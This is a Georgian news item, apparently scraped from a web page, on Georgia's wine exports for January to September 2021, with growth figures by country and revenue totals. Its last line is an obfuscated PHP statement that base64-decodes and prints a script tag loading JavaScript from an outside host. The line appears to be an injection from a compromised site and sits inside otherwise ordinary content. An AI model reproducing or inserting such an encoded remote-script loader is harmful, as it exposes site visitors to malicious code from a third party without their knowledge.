celsiusi
ავერსი საქკაბელი
2021 წლის 9 თვეში, საქართველოდან მსოფლიოს 60 ქვეყანაში 72,5 მლნ ბოთლი ღვინოა ექსპორტირებული.
 
როგორც WWW.BUSINESSTIME.GE-ის ღვინის ეროვნული სააგენტოდან აცნობეს, მიმდინარე წლის იანვარ-სექტემბერში საქართველოდან ექსპორტირებული ღვინით მიღებული შემოსავალი 168 მლნ აშშ დოლარს აღწევს, რაც გასული წლის ანალოგიურ  მონაცემზე 11%-ით მეტია, 12%-ით გაზრდილია ექსპორტირებული ღვინის რაოდენობაც.
 
ქართული ღვინის სტრატეგიულ ბაზრებზე ექსპორტის ზრდის დინამიკა შენარჩუნებულია:  
 
პოლონეთი - 24% (4156777), 
ჩინეთი - 16% (3961484), 
ლატვია - 2% (1218075), 
ლიეტუვა - 36% (744600), 
აშშ - 18% (807413), 
გერმანია - 21% (604136),
დიდი ბრიტანეთი -  178% (513724).
 
ქართული ღვინის საექსპორტო ქვეყნების პირველი ხუთეულია: რუსეთი, უკრაინა, პოლონეთი, ჩინეთი და ყაზახეთი.
 
მიმდინარე წელს, ზრდა აღსანიშნავია შემდეგ  ქვეყნებში: კანადა - 88% (261538), შვედეთი - 59% (96400), ჩეხეთი - 202% (112356), საფრანგეთი - 7% (56800), ყაზახეთი - 32% (2805598), ისრაელი - 28% (304827), აზერბაიჯანი - 21% (162527), თურქეთი - 209% (93330), უკრაინა - 8% (8609575), რუსეთი - 7% (43350901), მონღოლეთი - 146% (362370), ბელარუსი - 12% (2642509) და ა.შ.
 
საქართველოდან სხვადასხვა მოცულობის ღვინის ექსპორტი 397-მა კომპანიამ განახორციელა.
 
ღვინის, ბრენდის, ჭაჭის, საბრენდე სპირტისა და ჩამოსასხმელი ბრენდის ექსპორტის შედეგად მიღებული შემოსავალი 270 მლნ აშშ დოლარი შეადგენს, რაც 15%-ით აღემატება, გასული წლის ანალოგიური პერიოდის მაჩვენებელს.
 
 
1194
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");